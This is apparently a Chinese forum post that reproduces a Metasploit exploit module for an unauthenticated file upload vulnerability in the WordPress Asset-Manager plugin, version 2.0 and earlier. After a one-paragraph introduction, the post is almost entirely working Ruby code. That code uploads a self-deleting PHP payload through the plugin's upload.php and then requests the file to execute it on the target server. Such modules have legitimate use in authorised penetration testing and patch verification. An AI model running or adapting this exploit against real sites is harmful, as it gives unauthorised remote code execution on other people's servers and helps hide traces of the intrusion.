
WordPress Asset-Manager PHP文件上传漏洞

发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用的是 Metasploit 漏洞库中收录的、在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该插件允许上传 PHP 文件:用户无需身份验证即可把文件上传到一个临时目录,从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WordPress
# Asset-Manager plugin (<= 2.0).
#
# Root cause as described by the module: the plugin's upload.php accepts a
# multipart upload without any authentication and stores the file under a
# web-reachable temp directory with its original name, so a .php upload is
# directly executable by the web server. The module relies on the HttpClient
# mixin for transport and on PhpEXE for payload generation.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, description, authors, references,
  # payload constraints, targets) and the single module-specific option.
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info = {})
    authors = [
      'Sammy FORGIT',                          # initial discovery
      'James Fitts <fitts.james[at]gmail.com>' # metasploit module
    ]
    references = [
      ['OSVDB', '82653'],
      ['BID', '53809'],
      ['EDB', '18993'],
      ['URL', 'http:// www.myhack58.com /']
    ]
    targets = [
      ['Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }],
      ['Linux x86',             { 'Arch' => ARCH_X86, 'Platform' => 'linux' }]
    ]

    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         => authors,
      'License'        => MSF_LICENSE,
      'References'     => references,
      'Payload'        => { 'BadChars' => "\x00" },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => targets,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    # TARGETURI is the WordPress base path; host/port come from HttpClient.
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads a randomly named PHP file through the plugin's upload.php and then
  # requests that file from the plugin's temp upload directory.
  #
  # Fails with Exploit::Failure::UnexpectedReply when the upload response is
  # missing, is not a 200, or does not echo the uploaded file name, and when
  # the follow-up GET returns a response with a non-200 status.
  def exploit
    base = target_uri.path
    base << '/' unless base.end_with?('/')
    target_label = "#{rhost}:#{rport}"
    dropped_name = "#{rand_text_alpha(5)}.php"
    # unlink_self asks PhpEXE for a payload that removes its own file after it runs.
    php_body = get_write_exec_payload(unlink_self: true)

    mime = Rex::MIME::Message.new
    mime.add_part(php_body, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{dropped_name}\"")
    # Drop a leading CRLF before the first boundary, if Rex emitted one.
    form_body = mime.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{target_label} - Uploading payload #{dropped_name}")
    upload_request = {
      'method' => 'POST',
      'uri'    => "#{base}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{mime.bound}",
      'data'   => form_body
    }
    res = send_request_cgi(upload_request)

    # Success is judged solely by the file name being echoed in a 200 response.
    uploaded = res && res.code == 200 && res.body =~ /#{dropped_name}/
    fail_with(Exploit::Failure::UnexpectedReply, "#{target_label} - Upload failed") unless uploaded

    print_status("#{target_label} - Executing payload #{dropped_name}")
    res = send_request_raw({
      'uri'    => "#{base}wp-content/uploads/assets/temp/#{dropped_name}",
      'method' => 'GET'
    })

    # A missing response is tolerated here; only an explicit non-200 reply is treated as failure.
    fail_with(Exploit::Failure::UnexpectedReply, "#{target_label} - Execution failed") if res && res.code != 200
  end
end